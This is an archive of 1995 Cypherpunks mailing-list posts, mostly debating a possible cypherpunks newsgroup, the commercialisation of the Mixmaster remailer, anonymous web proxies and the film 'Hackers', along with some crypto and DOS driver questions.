> Have you tried an 'INSTALL=' line in the CONFIG.SYS to load
> the drive's TSR first? INSTALL is a rarely-documented feature for the
> CONFIG.SYS to load a TSR during its processing. I believe it also
> saves memory by not loading some sort of header into memory (DOS
> PSP maybe?), which may also cause a problem. Can't hurt to try
> though, eh?

After thinking about this (and drinking more coffee) I realized that he is loading the GUEST.EXE driver. This is not the best way to get the Zip drive to work. (It is meant as a temporary fix.)
There is actually a set of drivers that can be installed in the config.sys file. (Check the documentation for installing the ASPI drivers and install the PPA3 driver as the first of the three.) This is poorly documented by Iomega, but it works.

| Minister of Forced Caffinization in the DNRC      | alano at teleport.com   |
| "The moral PGP Diffie taught Zimmerman unites all | Disclaimer:            |
| mankind free in one-key-steganography-privacy!"   | Ignore the man         |
| -- PGP 2.6.2 key available on request --          | behind the keyboard.   |
| http://www.teleport.com/~alano                    |                        |

From carolab at censored.org Sat Sep 16 14:44:19 1995
From: carolab at censored.org (Censored Girls Anonymous)
Date: Sat, 16 Sep 95 14:44:19 PDT
Subject: AOL monitoring
In-Reply-To: <199509162055.NAA22204@netcom3.netcom.com>
Message-ID:

Thanks for the kewl.rad.tip

Love Always,
Carol Anne

On Sat, 16 Sep 1995, Vladimir Z. Nuri wrote:
> hello, apparently the recent FBI sting happened with the cooperation
> of AOL, which allowed the FBI to monitor downloads..
>
> here's some info to test if you are being monitored on AOL

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock <--now running linux 1.0.9 for your pleasure
carolann at censored.org
carolab at primenet.com
carolb at spring.com
-------------------------------------------------------------------------
A great place to start My Cyber Doc...

From unicorn at polaris.mindport.net Sat Sep 16 14:44:32 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Sat, 16 Sep 95 14:44:32 PDT
Subject: cypherpunks as a newsgroup
In-Reply-To: <199509162041.NAA10780@desiree.teleport.com>
Message-ID:

On Sat, 16 Sep 1995, Alan Olsen wrote:
> I have a group of friends who get forwarded the "best" of the Cypherpunks
> list.
> The signal to noise ratio is high enough that I have to be careful
> how much I forward lest I get complaints at the volume of what I forward.
> Turning this into an alt group would destroy that.

I don't understand this tendency to want to TURN the list into anything. Leave the list, and start an alt.* group if you like. I prefer the list, but will look at the group from time to time. Why must this be an either/or choice?

---
"In fact, had Bancroft not existed,         potestas scientiae in usu est
Franklin might have had to invent him."     in nihilum nil posse reverti
00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information

From don at cs.byu.edu Sat Sep 16 15:04:33 1995
From: don at cs.byu.edu (don at cs.byu.edu)
Date: Sat, 16 Sep 95 15:04:33 PDT
Subject: All Online Lusers, cryptoTCP
Message-ID: <199509162112.PAA02177@wero.byu.edu>

-----BEGIN PGP SIGNED MESSAGE-----

Well, I read the tip on how to find out if AOL is checking what I download. The good news is, they're DEFINITELY NOT. ;)

Anybody have a link to the encrypted TCP driver? I remember the original announcement didn't give a link.

Don

"So what you're saying is, if too many people are breaking into my house, I should leave the key under the doormat so the police can chase the crooks???"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

fRee cRyPTo! jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39)
June 7&14, 1995: 1st amendment repealed.
Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *

From syrinx at c2.org Sat Sep 16 15:11:20 1995
From: syrinx at c2.org (syrinx@c2.org (Syrinx Anonymous Remailer))
Date: Sat, 16 Sep 95 15:11:20 PDT
Subject: Commercial Mixmaster
Message-ID: <199509162201.PAA14969@infinity.c2.org>

Rich Salz wrote:
> >No, I'm not accusing Lance. But if he no longer has the time to
> >support Mixmaster, then perhaps some other crypto-friendly group
> >should take over the task and keep it an OPEN system, with source
> >code available. In fact, even freezing Mixmaster as is would be
> >preferable to "improvements" that people don't/can't trust.
>
> This doesn't make sense.
>
> Someone wants to commercialize Mixmaster. You don't know who it is,
> but since you can't see how to make money doing this, you suspect
> their motives. Yet on the other hand, you think they will be so
> successful that enough people will buy binary-only servers such that
> backdoors are a real threat, perhaps by forcing people to upgrade
> or otherwise breaking interoperability with the current free-source
> remailer network.
>
> You can't have it both ways.

Of course not, but it only has to *LOOK* that way. What if, let's say, this new "commercial" venture offers their "new, improved" version FREE for individual and non-profit use, much like Netscape is now offered, while supposedly working on the "commercial" development of the product. Now you've got a free product in the hands of end-users, plus it's compiled to support DOS, Win 3.1, Win95, Mac platforms, etc., as well as the current Unix. It doesn't matter if a commercial market is EVER developed, just so long as you provide a suitable "cover" motive for giving it away. Of course, source code is still not provided, since that would supposedly give competitors (for this supposedly developing commercial market) knowledge of the proprietary improvements.
The idea would be to take a standardized product and "steal" market share from the various PGP-chaining schemes, while doing it in such a way as to provide a back door for participating TLAs. Mixmaster is a superior product to the other schemes, but it suffers from lack of user-friendliness and availability on commonly-used platforms.

Think about this: if you were a TLA, can you think of a more cost-effective solution for keeping tabs on the increasingly THREATENING (to them) growth of anonymous e-mail? IOW, invest a few million to get a Trojan Horse crypto product into people's hands that they THINK is secure, and thus trust. Do you think they could use brute force to crack large quantities of IDEA or 3DES encrypted traffic for less money? If they can't crack PGP, then get people to switch to something they *THINK* is "more secure".

> But even if you could, there's a solution. :) Download the source
> and start releasing "blender", a free-source anonymous remail system
> that is upwardly compatible, *and based on* the current Mixmaster.

I think that's what I suggested, isn't it? Hopefully it will be a foreign (ITAR-exempt) individual or group.

From aba at dcs.exeter.ac.uk Sat Sep 16 15:31:40 1995
From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk)
Date: Sat, 16 Sep 95 15:31:40 PDT
Subject: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: <16598.9509162230@exe.dcs.exeter.ac.uk>

Tim May writes:
> Should there be an "alt.cypherpunks" type of newsgroup instead of this
> mailing list?

Not instead of; that would *kill it*, with all the effects everyone has been quick to point out, things like more noise, cross posts, loss of community-like atmosphere. Please don't anyone do that!

My 2nd post on the subject, just before yours in my mbox, contains my negative views on this idea. I just thought it would be a good medium for a separate discussion forum for Peter's proposed 'technology transfer' and public awareness idea.
I am really not keen on combining the two. I think if there is a need for it, and it gets created at all, it should be as a separate forum.

> It would be easy to create "alt.cypherpunks." I've been expecting to
> see it happen for the last 3 years. It could still happen. In fact,
> there's been talk of doing it (sorry for the passive "there has been
> talk," but I'll let the folks talking about doing it do the talking
> about it here).

Sure, alt groups are easy to create; there was a series of them in our spool with names from alt.-.-.-.-.0.0.0.0.0 through alt.-.-.-.-.-9.9.9.9.9 or something like that, till some admin cleaned them up, or someone put out a cancel for them.

> [more on why cpunks should stay as it is]
>
> In some sense, the Cypherpunks list is somewhere in-between a full
> newsgroup and a small working mailing list.

Couldn't agree more. Keep cpunks the way it is.

> Second, would the benefits of wider exposure, as "alt.cypherpunks,"
> more than balance out the negative effects mentioned above?

Don't think it'd be worth destroying the cypherpunks list over. alt groups are great for censorship-free discussion (alt.security.pgp and some of the other crypto groups have their good moments, and there are quite a few people who frequent the a.s.pgp group acting as pgp gurus, answering questions systematically at the rate of half a dozen a day or so it would seem. It's gotten to the stage where a pgp newcomer can post "how do you blah fingerprint blah", and there will be a whole bevy of regulars keen to help. Probably is very useful for PGP newbies.), so perhaps an alt.cypherpunks could develop this kind of a use. But some people view alt.* groups with disdain and don't look at them, so it might depend on the intended audience. A wider audience might be achieved with a comp, or other big8 group.

I thought recently about writing a cpunk technology FAQ, even got started with a list of what I wanted to include.
What I wanted to do was to gather together pointers to all of the available technology, crypto libraries, disk encryptors, remailers, etc, in a form which would be a useful quick reference, to know just what was available. It can sometimes be tricky to find all of these things, as you see people asking about disk encryptors in a.s.pgp, and about remailers, etc.

I had just finished the contents list when I came across, by browsing someone's cpunks page, Tatu Ylonen's 'International Cryptography Pages', so I junked my 'table of contents only' FAQ at that point because he had done it all, in comprehensive detail. I reckon perhaps WWW is a useful way to put across info; most of the FAQs which get posted to newsgroups have a WWW home, or end up being WWW only, and not posted at all, or pointer only.

I'm really impressed with Tatu's pages; take a look if you haven't seen them, as they're a really good cypherpunks technology resource guide. The software packages section is likely very useful reading, and would answer a lot of FAQ-like questions for some people with security and privacy questions. I reckon perhaps some of Peter's aims could be furthered by posting Tatu's pointer as a FAQ to a few of the crypto and security groups:

http://www.cs.hut.fi/ssh/crypto/

> This brings up a final point, with more than 10,000 newsgroups,
> including nearly a dozen devoted to crypto, PGP, security, and
> anonymity, aren't there already enough? A likely effect of
> "alt.cypherpunks" is this:
>
> From: david at sternlight.com (David Sternlight)
> Newsgroups: sci.crypt,alt.security.pgp,talk.politics.crypto,alt.cypherpunks

Yeah, that is a problem: all the security groups seem to get merged, much to the annoyance of people on sci.crypt, and leading to the creation of sci.crypt.research.

Also, the point of there being lots of newsgroups already is interesting, because when you look at the crypto and privacy related groups there are already a whole load of related ones.
It is just that the noise ratio on most of them is rather bad. Perhaps a systematic posting of some useful FAQs and URLs would generate a useful effect in terms of increasing use and awareness of cryptographic solutions to security problems, and as privacy-preserving methods. Larry Detweiler used to post the CRAM series; some of the info disseminated was useful. Perhaps a similar approach could be taken, posting cypherpunks technology FAQs to relevant groups. MPJ's getting-PGP FAQ has lots of PGP info; something similar, or just the insistent, helpful reposting of Tatu's URL in places where people ask about such info, might be useful.

> But, if anyone wants it, create it. Then people can vote with their
> feet. Both the list and the newsgroup can co-exist, and if the
> newsgroup "wins," the list can be dropped.

I for one would prefer to see it in a co-exist mode, with different objectives.

I'll go away now, and let Peter continue, if he hasn't been put off by the mixed responses.

Adam

From carolann at censored.org Sat Sep 16 15:53:31 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Sat, 16 Sep 95 15:53:31 PDT
Subject: Look, a *.cypherpunk group already exists!
Message-ID: <199509162253.PAA26158@usr1.primenet.com>

Over here at Primenet, there is a newsgroup called mail.cyperpunks. It came in as a newgroup a couple of weeks ago. New articles posted to it make the list. I'm amazed we haven't been commercially spammed yet! But it's there already. Just in the mail hierarchy, that's all.

alt.cypherpunks? ohmigawd! Sheesh!
Love Always,
Carol Anne
--
Member Internet Society - Certified BETSI Programmer - Webmistress
***********************************************************************
Carol Anne Braddock (cab8)    carolann at censored.org    206.42.112.96
My Homepage    The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&
http://dcs.ex.ac.uk/~aba/export/

From harmon at tenet.edu Sat Sep 16 16:31:02 1995
From: harmon at tenet.edu (Dan Harmon)
Date: Sat, 16 Sep 95 16:31:02 PDT
Subject: Quantum computing info?
In-Reply-To: <199509160259.TAA03727@goblin.punk.net>
Message-ID:

Check out the newest issue of Scientific American.

Dan

On Fri, 15 Sep 1995, Jeff Simmons wrote:
> Could anyone point me to information on 'quantum' computing?
> --
> Jeff Simmons jsimmons at goblin.punk.net
>

From dl at hplyot.obspm.fr Sat Sep 16 16:47:55 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Sat, 16 Sep 95 16:47:55 PDT
Subject: Anonymous WWW proxies
Message-ID: <9509162347.AA09904@hplyot.obspm.fr>

-----BEGIN PGP SIGNED MESSAGE-----

I'm halfway through the coding of a simple anonymous WWW proxy, but before going any further, I'd like to know:

+ If this has not been done before and is available? (and where)

+ If there is any interest

+ Chaining would be imo a good idea (ie cli <-> anonproxy1 <-> anonproxy2 <-> ... <-> server), but how would you manage to tell your favorite web browser to add in its header something like Http-Proxy-List: anonproxy2, ... An alternative would be to have a database of available (running) proxies and have the proxy itself randomly choose a next route?

+ A way to solve the previous pb and to add in encryption (but would it be fast enough for web browsing?) would be that each user runs a local proxy (that could be optionally used by other folks) that would do pgp encryption/decryption, 'routing' selection, etc...
Would ppl with mail remailers and/or W3 experience comment? (or tell me the pointer toward the already solved, already implemented beast that would do the above)

- --
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom
Prime#1: one hundred five thousand one hundred five billion one hundred five thousand one hundred sixty-seven

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface
-----END PGP SIGNATURE-----

From wilcoxb at nagina.cs.colorado.edu Sat Sep 16 16:54:06 1995
From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox)
Date: Sat, 16 Sep 95 16:54:06 PDT
Subject: "alt.cypherpunks" Newsgroup vs. Mailing List?
In-Reply-To: <9509161930.AA08524@spirit.aud.alcatel.com>
Message-ID: <199509162353.RAA06965@nagina.cs.colorado.edu>

-----BEGIN PGP SIGNED MESSAGE-----

Several people are working on improvements to netnews which allow more active filtering. The most promising techniques that I have heard about involve a lot of "ratings" being generated by readers and then taken into account by other readers when filtering/sorting the articles.

I am perfectly happy with the social scene on the cypherpunks list as is, and I think those who want to move to a newsgroup don't know what they are asking for. (Go read sci.crypt and talk.politics.crypto for awhile. I expect an "alt.cypherpunks" would be indistinguishable from those two in short order.)

BUT, I was thinking that this group (I mean, this group of people) would make an excellent group to test this new technology. Think about it: Perry Metzger could routinely give conspiracy articles/authors a "-10" rating, and those of us who agreed with him could set our "Perry coefficients" to indicate the degree to which we agree with his evaluations.
Thus we might actually gain a *higher* SNR by moving to UseNet. (And it would provide an exciting example of reputations in action...)

I don't know if the technology is there yet, or if it is accessible to most of our readers. One person who is working on such a scheme is "(cm)", or "na48985 at anon.penet.fi". I have added his name to the Cc: line so perhaps he would be so kind as to tell us about his "NoCeM" ("No see 'em!") software.

Bryce

signatures follow:
+ public key on keyservers       /. island Life in a chaos sea
or via finger 0x617c6db9        / bryce.wilcox at colorado.edu ---*

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta4
-----END PGP SIGNATURE-----

From roy at cybrspc.mn.org Sat Sep 16 17:16:04 1995
From: roy at cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 16 Sep 95 17:16:04 PDT
Subject: CYPHERPUNK considered harmful
In-Reply-To: <14439.9509161026@exe.dcs.exeter.ac.uk>
Message-ID: <950916.115448.5Q5.rnr.w165w@cybrspc.mn.org>

-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, aba at dcs.exeter.ac.uk writes:
> One thing I have been thinking would be nice would be a USENET
> newsgroup, as mailing lists are a step away from easy access which
> some people never make.

That's a feature, not a bug. Unless the group was moderated, I predict the S/N ratio to be <= 0. Witness the crap in alt.2600. The mailing list, as someone said before me, works as a limited pre-screening system. Given the nature of the list's focus and discussion, I think a newsgroup would end up being a stable attractor for the clue-deficit crowd. Not something I'd find useful.

- --
Roy M.
Silvernail [ ] roy at cybrspc.mn.org
PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6
Key available from pubkey at cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From steven at echonyc.com Sat Sep 16 17:40:41 1995
From: steven at echonyc.com (Steven Levy)
Date: Sat, 16 Sep 95 17:40:41 PDT
Subject: "Hackers"-- brief review and anecdote...
In-Reply-To:
Message-ID:

>I saw "Hackers" yesterday. It's not bad and its political sensibility is
>very cyberpunk. The ad campaign even uses the tag line, "Their only crime
>is curiosity."

It may not be a crime, but it's not nice to steal a title.

From remailer at flame.alias.net Sat Sep 16 17:41:19 1995
From: remailer at flame.alias.net (Flame Remailer)
Date: Sat, 16 Sep 95 17:41:19 PDT
Subject: (noise) Re: SPAM bait
In-Reply-To: <199509161913.PAA55049@tequesta.gate.net>
Message-ID: <199509170041.CAA29649@utopia.hacktic.nl>

> What I don't understand about inappropriate SPAMs like that one
> (or telephone ads) is; what's the business incentive to do it?
> I assume that no Cypherpunk has subscribed to "Janet's" magazines,
> and I know that no Ray has _EVER_ spent money over a telephone
> unless we initiated the call, yet *still* we get unwanted calls
> every once-in-a-while. WHY?

Well, that may be true, but I'd suspect that the average IQ on this list is significantly higher than the net at large. So if you spammed enough newsgroups, chances are that you'd find a sucker somewhere.
Even tho it is becoming more common for marketing firms to keep databases of who buys (or doesn't buy) what, I suspect that a lot of calling is still done at random (the local newspaper still calls us even tho we have subscribed for years and told them several times that they are wasting their time calling. So I suspect it is just done at random.)

These days, many telemarketers have autodialers that call ahead and then connect a salesman after you have answered the phone. So if I get a call, say hello, and hear silence and then a click of being transferred to the next available salesperson, that is my cue to hang up.

> [Please respond privately to liberty at gate.net ]

uh, well at least this post is labelled 'noise' for the mailfilters...

From jamesd at echeque.com Sat Sep 16 18:29:34 1995
From: jamesd at echeque.com (James A. Donald)
Date: Sat, 16 Sep 95 18:29:34 PDT
Subject: Mixmaster status changing
Message-ID: <199509170127.SAA20213@blob.best.net>

At 03:04 PM 9/14/95 -0700, Lance Cottrell wrote:
>There has been an offer to purchase and commercially develop Mixmaster.
>This will hasten the development of Mixmaster for other platforms (e.g.
>Dos, Windows Macintosh), and bring significant improvements to the
>interface, but I will not compromise on the level of security provided by
>Mixmaster. Free client software will continue to be available.

This is great, but of course what we urgently need is a free Windows client. What is the score on this?

---------------------------------------------------------------------
We have the right to defend ourselves      | http://www.jim.com/jamesd/
and our property, because of the kind      |
of animals that we are. True law           | James A. Donald
derives from this right, not from the      |
arbitrary power of the state.              |
                                           | jamesd at echeque.com

From nelson at crynwr.com Sat Sep 16 18:45:50 1995
From: nelson at crynwr.com (Russell Nelson)
Date: Sat, 16 Sep 95 18:45:50 PDT
Subject: Commercial Mixmaster
In-Reply-To: <199509161921.MAA05294@infinity.c2.org>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

   Date: Sat, 16 Sep 1995 12:21:04 -0700
   From: "syrinx at c2.org (Syrinx Anonymous Remailer)"

   The concern is not "commercialization", per se, but rather the use of
   "commercialization" as an excuse to build in "proprietary" features
   (Back doors?) for which no corresponding source code is involved.

And the chief concern with the Clipper chip? That it was secret. In the crypto world, secret == untrustable. Who would use a remailing network that was not trustable? Who would use it when every cypherpunk says not to?

   Since no one has made a good case for there even being a COMMERCIAL
   market for Mixmaster, could there be other motives?

Value is created by seeing a market that no one else sees. Obvious markets have low margins, and they're getting lower and lower as computers help implement the obvious. Without building an anonymous e-$ infrastructure first, there's no way to even charge for the use of a remailing service without sacrificing anonymity, even if people were willing to pay to have messages anonymously remailed. Maybe someone *does* see a way to create a system? If *you* knew, would you tell everyone about it? Or would you implement it, and rake in the bucks?

   No, I'm not accusing Lance. But if he no longer has the time to
   support Mixmaster, then perhaps some other crypto-friendly group
   should take over the task and keep it an OPEN system, with source
   code available. In fact, even freezing Mixmaster as is would be
   preferable to "improvements" that people don't/can't trust.

Since you have no reputation to impugn, I feel free to be rude: "Put up or shut up." If you have the resources to improve Mixmaster so that it's easy to use, do it.
If not, please don't stand in the way of people who *do* have the resources.

-----BEGIN PGP SIGNATURE-----
Version: 2.7
Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface
-----END PGP SIGNATURE-----

--
-russ http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 (9201 FAX)                  | America neither a Christian,
Potsdam, NY 13676 |                                             | Jewish, Islamic, nor atheist (etc&) nation. This is good.

From rjc at clark.net Sat Sep 16 19:18:16 1995
From: rjc at clark.net (Ray Cromwell)
Date: Sat, 16 Sep 95 19:18:16 PDT
Subject: "Hackers"-- brief review and anecdote...
In-Reply-To:
Message-ID: <199509170217.WAA10568@clark.net>

> >I saw "Hackers" yesterday. It's not bad and its political sensibility is
> >very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> >is curiosity."
>
> It may not be a crime, but it's not nice to steal a title.

I think there's a high probability of someone independently inventing the title "hackers" for this movie rather than stealing it. It's not very original. Besides, the content of your book has very little to do with this movie. The movie would be more appropriately titled "crackers" or "phreakers".

-Ray

From rshea at netcom.com Sat Sep 16 20:00:16 1995
From: rshea at netcom.com (rex)
Date: Sat, 16 Sep 95 20:00:16 PDT
Subject: cypherpunks as a newsgroup
In-Reply-To: <14439.9509161026@exe.dcs.exeter.ac.uk>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <43f97c$64n at calum.csclub.uwaterloo.ca>, you wrote:
>Dr.
>Dimitri Vulis wrote:
>>
>>Anything posted to the main cypherpunks mailing list and the spun-off mailing
>>lists (steganography, remailers, nym servers, etc) could be posted to the
>>newsgroup by making one of the mail2news gateways a subscriber.
>
>That was my thinking exactly. That's why I wrote just such a mail2news
>gateway to a local newsgroup, csc.lists.cypherpunks (moderated, with
>cypherpunks at toad.com as the moderator), as you can probably see in
>the header.
>
>This way, trn groups all articles with the same subject together,
>and correctly threads articles that have References: or In-Reply-To:
>headers.

Some readers may not know they can use Yarn/UQWK under DOS or OS/2 to read this list as if it were a newsgroup. Yarn has Filters which can be used to move email from various lists to pseudo-newsgroups, and the threading, References, etc, work nicely. PGP signing/encryption is a menu choice. A hook for a MIME processor is provided. Trn filters may be used to filter the real newsgroups before the mail and news is packed into a SOUP packet by UQWK.

There is a Yarn list: yarn-list at lists.colorado.edu
More info: http://www.nic.com/~cannon/handson.html

- -rex

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i
-----END PGP SIGNATURE-----

From tcmay at got.net Sat Sep 16 20:28:47 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 16 Sep 95 20:28:47 PDT
Subject: [ASSENT NOISE] Re: C-punks, marketing for the masses
Message-ID:

At 8:08 PM 9/16/95, Greg Broiles wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>No disrespect intended, but I think that the various "let's sanitize
>the Cypherpunk message for mass acceptance" marketing/soundbite
>proposals are pointless. Cypherpunks is a mailing list, not a political
>party (or a platform).
>
>- From my perspective, the organizing meme for the list is not "strong
>crypto is really important, so let's write some and lobby our lawmakers
>to make sure it stays legal" but "strong crypto is here and is changing
>the dynamics of force, politics, and power, so let's see what we can
>do with it."

Hear, hear! Greg is absolutely right. (And Dave Mandl was, too, about our mailing list not being a corporation trying to increase market share.)

I applaud the efforts to lobby Congresscritters to vote in ways we would find desirable (though I note with some irony that the Congressman who has come out most strongly _against_ Net censorship is Newt Gingrich, often demonized by many. To the credit of EFF and EPIC, and others of that ilk, they noted this fact.)

But as Greg points out, we are not a political party. More to the point, we have no centralized resources, no staff, no travel budgets, no ability to appoint spokespunks to speak to the media. This is a weakness, and a strength.

I think it was Bill Stewart who noted that the "conventional" cyberspace lobbying groups, such as EFF, EPIC, CPSR, etc., are largely "director-driven," with a handful (or just one or two) directors making decisions, speaking publicly, and getting all the attention. The Cypherpunks group is not like that. Lacking any formalized leadership, and--most importantly--lacking offices in D.C., we can't be asked to perform like the usual trained seals who produce the soundbites that fit into the stories too many reporters want. Again, a weakness and a strength.

I sense in the debate here that some of us want to have more of an impact, more of a political impact. The cynic in me says these people have just not been in the game long enough to become realists (to a cynic, cynicism is realism).

>(And no, I don't think it's important to spread that "meme" (a term
>I use with some trepidation) around to get "market share" for it.
>Ideas are not football teams nor initiative proposals.)
>
>I appreciate and support and have participated in various write-yer-
>legislator activities. They're useful short-term. But if Tim May and
>Duncan Frissell and the other list members who've dared to make predictions
>about the impact of crypto on government and economics are correct,
>what the government and the legislators want doesn't matter. If they're
>wrong, what we want doesn't matter.

I suppose it is mainly Duncan and I who make these points, with contributions also from Sandy Sandfort, Black Unicorn, Lucky Green, and others (sorry if I've left you out of the Crypto Anarchy Hall of Shame^H^H^H^H^H Fame).

Please understand that I am not elitist in the sense of wishing to limit access to ideas many of us espouse. I discourage no one from calling in to radio talk shows, from writing articles, and so on. But I'm not convinced that "political action" matters very much. As Greg puts it, if we're right, politics won't matter. And if we're wrong, politics won't matter.

--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May                 | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152   | anonymous networks, digital pseudonyms, zero
Corralitos, CA                 | knowledge, reputations, information markets,
Higher Power: 2^756839         | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From tcmay at got.net Sat Sep 16 20:41:15 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 16 Sep 95 20:41:15 PDT
Subject: Newbie Crypto question: MOD?
Message-ID:

At 8:39 PM 9/16/95, Childers James wrote:
>Ok folks, I recently received "Applied Cryptography" as a gift, and just
>have one question: How does the MOD function work in crypto functions? It
>seems to work differently than what I've seen before, i.e.: C/C++ MOD. I
>also didn't see anything in TCM's FAQ...
>
>If this is considered noise, I apologize in advance.
I didn't put anything in my FAQ about "mod" because my FAQ was not a crypto FAQ per se, of which there are at least two. (Cf. sci.crypt for regular pointers.) And I doubt that either of these FAQs discusses the mod function, though I haven't checked.

In any case, Schneier devotes several pages to mod, starting with "You all learned modular arithmetic in school; it was called "clock arithmetic"" (p. 198). After defining it, Schneier goes on to discuss its use in modern cryptography.

If this isn't enough of an explanation, I don't know what more to say.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From adam at bwh.harvard.edu Sat Sep 16 20:49:58 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Sat, 16 Sep 95 20:49:58 PDT
Subject: Commercial Mixmaster
In-Reply-To:
Message-ID: <199509170348.XAA06314@bwh.harvard.edu>

It's worth noting that the source code to Julf's Penet remailer is not public (AFAIK). People use it because they trust Julf, or trust people who trust Julf.

There is clearly a market for anonymizing services in various forms. Hopefully, whoever is putting up cash is also looking at building a web proxy service, a pseudonymous system, and a mail drop/data haven type of operation (although the last might not fit in as well.) If you don't see a market, I suggest you drop a line offering services to the friendly folks at president at whitehouse.gov. I'm sure they'd prefer a bit of privacy.

Why pay for remailers when there are free ones? Speed and lawyers pop right up as damn good answers.
Putting up a couple of p120s on a T1 in the Caribbean isn't cheap, nor is making sure you have a good lawyer who'll protect the machines when the bad guys show up with warrants. I'd be much happier to use a fast system on good legal ground than a freebie.

Adam

Russ Nelson wrote:
| The concern is not "commercialization", per se, but rather the use
| of "commercialization" as an excuse to build in "proprietary"
| features (Back doors?) for which no corresponding source code is
| involved.
|
| And the chief concern with the Clipper chip? That it was secret. In
| the crypto world, secret == untrustable. Who would use a remailing
| network that was not trustable? Who would use it when every
| cypherpunk says not to?
|
| Since no one has made a good case for there even being a COMMERCIAL
| market for Mixmaster, could there be other motives?
|
| Value is created by seeing a market that no one else sees. Obvious
| markets have low margins, and they're getting lower and lower as
| computers help implement the obvious.

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From hallam at w3.org Sat Sep 16 21:30:30 1995
From: hallam at w3.org (hallam at w3.org)
Date: Sat, 16 Sep 95 21:30:30 PDT
Subject: "Hackers"-- brief review and anecdote...
In-Reply-To:
Message-ID: <9509170429.AA05221@zorch.w3.org>

>I saw "Hackers" yesterday. It's not bad and its political sensibility is
>very cyberpunk. The ad campaign even uses the tag line, "Their only crime
>is curiosity."

I know companies who have spent millions cleaning up after a hacker breakin. I've been up at two in the morning trying to stop a person with known mental problems breaking into a site with some very dangerous computer controlled machinery. I've dealt with people trying to get rich quick by defrauding others. I've met some real evil bastards who simply want to ruin as many other people's lives as they possibly can, including people that thought they were their friends.
To me teenagers who break into computer systems are not funny at all, it's like joyriding, it's funny until someone gets hurt. I know people who have got hurt real bad.

I like having privacy, part of the cost of that privacy is respecting the privacy of others.

Phill

From cwe at Csli.Stanford.EDU Sat Sep 16 22:18:02 1995
From: cwe at Csli.Stanford.EDU (Christian Wettergren)
Date: Sat, 16 Sep 95 22:18:02 PDT
Subject: Anonymous WWW proxies
In-Reply-To: <9509162347.AA09904@hplyot.obspm.fr>
Message-ID: <199509170517.WAA16625@Csli.Stanford.EDU>

| + Chaining would be an imo good idea (ie cli <-> anonproxy1 <->
| anonproxy2 <-> ... <-> server) but how would you manage to tell
| your favorite web browser to add in its header something like
| Http-Proxy-List: anonproxy2, ...
| An alternative would be to have a database of available (running)
| proxies and that the proxy itself randomly choose a next route ?

Don't most of the browsers support a "firewall-proxy-mode", where all queries are sent off to a special daemon, that forwards the query on. This would probably be the place to add the header-munging.

How do you plan to get the reverse-path working? Having an encrypted/chained return path in the request?

| + A way to solve previous pb and to add in encryption (but would it
| be fast enough for web browsing ?) would be that each user runs a
| local proxy (that could be optionally used by other folks) that
| would do pgp encryption/decryption, 'routing' selection,etc...
|
| Would ppl with mail remailers and/or W3 experience comment ?
| (or tell me the pointer toward the already solved, already implemented
| beast that would do the above)

Encryption speed isn't all that an issue always. I'm planning to do an Mbone encryption gateway, (RSN). I will precompute a cryptographic mask during idle cycles, that can be XORed together with the clear-text packet when it arrives. I expect it to reduce the latency quite a lot.
(This might not work, since it assumes the key distr problem is already solved in good time before the packet arrives, to be able to amass "precomputational power".)

/Christian

From greg at ideath.goldenbear.com Sat Sep 16 22:22:19 1995
From: greg at ideath.goldenbear.com (Greg Broiles)
Date: Sat, 16 Sep 95 22:22:19 PDT
Subject: Commercial Mixmaster
Message-ID: <199509170513.AA06296@ideath.goldenbear.com>

-----BEGIN PGP SIGNED MESSAGE-----

Adam Shostack writes:
> It's worth noting that the source code to Julf's Penet remailer
> is not public (AFAIK). People use it because they trust Julf, or
> trust people who trust Julf.

